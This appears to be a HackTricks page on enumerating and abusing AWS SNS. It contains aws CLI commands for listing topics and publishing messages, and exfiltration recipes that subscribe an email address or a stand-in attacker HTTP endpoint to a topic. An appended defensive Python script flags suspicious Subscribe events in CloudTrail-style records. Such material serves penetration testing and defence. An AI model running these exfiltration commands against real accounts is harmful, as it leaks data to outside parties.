AWS - SNS Enum

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:

SNS

Amazon Simple Notification Service (Amazon SNS) is described as a fully managed messaging service. It supports both application-to-application (A2A) and application-to-person (A2P) communication types.
For A2A communication, the key feature is the publish/subscribe (pub/sub) mechanism, built around topics that enable high-throughput, push-based, many-to-many messaging. This is particularly useful for distributed systems, microservices, and event-driven serverless architectures: a publisher sends a message to a topic once, and SNS distributes it to every subscriber of that topic (the fanout messaging pattern).

Differences from SQS

SQS is a queue-based service that allows point-to-point communication, ensuring that messages are processed by a single consumer. It offers at-least-once delivery, supports standard and FIFO queues, and allows message retention for retries and delayed processing. On the other hand, SNS is a publish/subscribe-based service, enabling one-to-many communication by broadcasting messages to multiple subscribers simultaneously. It supports various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS, and provides filtering mechanisms for targeted message delivery. While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns.

Enumeration

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
    --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
    --message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
    --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
    --protocol email \
    --notification-endpoint <email>

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region> \
    --protocol http \
    --notification-endpoint http://<attacker>/ \
    --topic-arn <arn>
Note that if the topic is of type FIFO, only subscribers using the SQS protocol can be used (HTTP or HTTPS subscriptions are not supported).
Also, even though the --topic-arn contains the region, make sure you specify the correct region in --region; otherwise you will get an error that looks like a permissions (access denied) problem, when the real cause is the wrong region.
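From the defender's side, the subscribe calls above leave a CloudTrail trail. The following is an added example (not part of the original page) that runs over constructed CloudTrail-style records and flags Subscribe events whose protocol sends topic messages outside the account (email, SMS, HTTP/HTTPS) to a destination not on an allow-list; the record field names, the allow-lists and the sample records are assumptions.

```python
from urllib.parse import urlparse

# Constructed CloudTrail-style records for illustration (not real logs).
# Assumed field names: requestParameters.topicArn / .protocol / .endpoint.
TOPIC = "arn:aws:sns:us-west-2:123456789012:my-topic"
SAMPLE_EVENTS = [
    {"eventSource": "sns.amazonaws.com", "eventName": "Subscribe",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/deploy"},
     "requestParameters": {"topicArn": TOPIC, "protocol": "lambda",
                           "endpoint": "arn:aws:lambda:us-west-2:123456789012:function:handler"}},
    {"eventSource": "sns.amazonaws.com", "eventName": "Subscribe",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ci-runner"},
     "requestParameters": {"topicArn": TOPIC, "protocol": "email",
                           "endpoint": "someone@mail.example.org"}},
    {"eventSource": "sns.amazonaws.com", "eventName": "Subscribe",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ci-runner"},
     "requestParameters": {"topicArn": TOPIC, "protocol": "http",
                           "endpoint": "http://203.0.113.10/"}},
    {"eventSource": "sns.amazonaws.com", "eventName": "Subscribe",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/deploy"},
     "requestParameters": {"topicArn": TOPIC, "protocol": "https",
                           "endpoint": "https://hooks.example.com/sns"}},
    {"eventSource": "sns.amazonaws.com", "eventName": "ListTopics",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/deploy"},
     "requestParameters": None},
]

ALLOWED_EMAIL_DOMAINS = {"example.com"}     # assumed corporate mail domain(s)
ALLOWED_HTTP_HOSTS = {"hooks.example.com"}  # assumed approved webhook receivers
# Protocols whose endpoint lives outside the AWS account; sqs/lambda/firehose stay inside.
EXTERNAL_PROTOCOLS = {"email", "email-json", "sms", "http", "https"}

def subscribe_finding(event, allowed_email_domains=ALLOWED_EMAIL_DOMAINS,
                      allowed_http_hosts=ALLOWED_HTTP_HOSTS):
    """Return a finding for a Subscribe event whose endpoint is an unapproved
    external destination, or None if the event is not of interest."""
    if event.get("eventSource") != "sns.amazonaws.com" or event.get("eventName") != "Subscribe":
        return None
    params = event.get("requestParameters") or {}
    protocol = (params.get("protocol") or "").lower()
    endpoint = params.get("endpoint") or ""
    if protocol not in EXTERNAL_PROTOCOLS:
        return None
    if protocol.startswith("email"):
        if endpoint.rpartition("@")[2].lower() in allowed_email_domains:
            return None
    elif protocol in ("http", "https"):
        if (urlparse(endpoint).hostname or "").lower() in allowed_http_hosts:
            return None
    # sms is always reported: no phone-number allow-list is modelled here
    return {"actor": (event.get("userIdentity") or {}).get("arn"),
            "topic": params.get("topicArn"), "protocol": protocol, "endpoint": endpoint}

def scan(events):
    """Apply subscribe_finding to every record and keep the hits, in order."""
    return [f for f in (subscribe_finding(e) for e in events) if f]
```

Pair this with a review of `list-subscriptions` output for entries still in `PendingConfirmation`, since an HTTP subscription only delivers after the SubscribeURL has been visited.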

Unauthenticated Access

Privilege Escalation

Post Exploitation

Persistence
